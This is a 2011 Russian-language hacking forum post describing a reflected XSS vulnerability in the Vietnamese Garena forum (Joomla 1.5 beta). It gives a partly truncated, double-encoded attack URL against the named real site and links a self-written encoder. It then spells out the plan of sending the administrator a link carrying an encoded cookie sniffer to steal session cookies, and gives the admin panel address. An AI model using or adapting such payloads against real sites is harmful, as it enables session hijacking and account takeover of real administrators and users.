Добро пожаловать на ExpHack.ucoz.org
Make-amxserv.ru
1
Наши сервера ExpHack
















[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
  • Страница 1 из 1
  • 1
Модератор форума: Mo_One  
Пассивная XSS на garena.vn
: Добавлено: 10.02.2011
Автор: Exp | Просмотрело: | Прокомментировало:
Пассивная XSS на вьетнамском форуме гарены. (Joomla 1.5 beta 3 от января 2010). Форум работает с обычными аккаунтами гарены.
----------
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему. Уязвимость существует из-за недостаточной обработки входных данных сценарием index.php. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
----------

Видео:
http://yehg.net/lab/pr0js/training/v...0_encoded-xss/

Пример:
http://garena.vn/index.php?option=co...%372%%374%%328
%%32f%%35a%%32e%%352%%361%%37a%%36f%%372%%320%%377 %%361%%373
%%320%%368%%365%%372%%365%%32f%%329%%33c%%32f%%373 %%363%%372%%369%%370%%374%%33e=oo
<Без переносов строки>

Поскольку енкодера не нашел вообще - написал свой:
http://www.sendspace.com/file/8qrg62

По факту - суем админу ссыль с закодированным сниффером и ловим куки...

админка тут: http://garena.vn/administrator/

Источник
http://www.zerverteam.com/id44

Далее
  • Страница 1 из 1
  • 1
Поиск:
2
Навигация